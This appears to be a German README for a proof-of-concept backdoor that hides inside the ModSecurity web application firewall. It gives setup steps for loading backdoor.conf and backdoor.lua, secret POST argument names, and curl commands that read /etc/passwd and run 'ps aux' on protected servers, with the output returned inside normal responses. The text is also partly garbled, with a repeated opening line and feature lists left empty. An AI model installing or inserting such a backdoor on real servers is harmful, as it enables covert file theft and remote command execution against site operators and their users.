
Dies ist ein Proof-of-Concept für Schadsoftware, die innerhalb der ModSecurity-WAF läuft.
Dies ist ein Proof-of-Concept für bösartige Software, die innerhalb der ModSecurity WAF läuft.
Die Software hat zwei Hauptfunktionen:
Zusätzlich enthält sie diese Funktionen:
SecStreamOutBodyInspection und SecContentInjection sind auf On gesetztHolen Sie sich die Dateien backdoor.conf und backdoor.lua und laden Sie die erste in den Webserver.
Die Konfiguration erfolgt in der ersten Regel in der Datei backdoor.conf.
Mit dieser Einstellung kann der Name des POST-Arguments festgelegt werden, mit dem Dateiinhalte abgerufen werden. Setzen Sie ihn auf einen beliebigen Zufallswert wie koomem6Shmog.
Mit dieser Einstellung kann der Name des POST-Arguments festgelegt werden, das zum Ausführen von Befehlen verwendet wird. Setzen Sie ihn auf einen beliebigen Zufallswert wie tys4Olhuibves.
Befehle können auf jeder Adresse (Domain) des Zielservers ausgeführt werden, der sich hinter der ModSecurity WAF befindet. Die Ausgabe der Befehle wird an die Standard-Serverantwort angehängt.
Dateiinhalt abrufen:
curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"
Befehl ausführen und Ausgabe erhalten:
curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"
Copyright (c) 2022 Jozef Sudolsky. Alle Rechte vorbehalten.
„DIE BIER-WARE-LIZENZ“ (Revision 42): [email protected] hat diese Datei geschrieben. Solange Sie diesen Hinweis beibehalten, können Sie mit diesem Material machen, was Sie wollen. Wenn wir uns eines Tages treffen und Sie denken, dass dieses Material es wert ist, können Sie mir ein Bier ausgeben. Jozef Sudolsky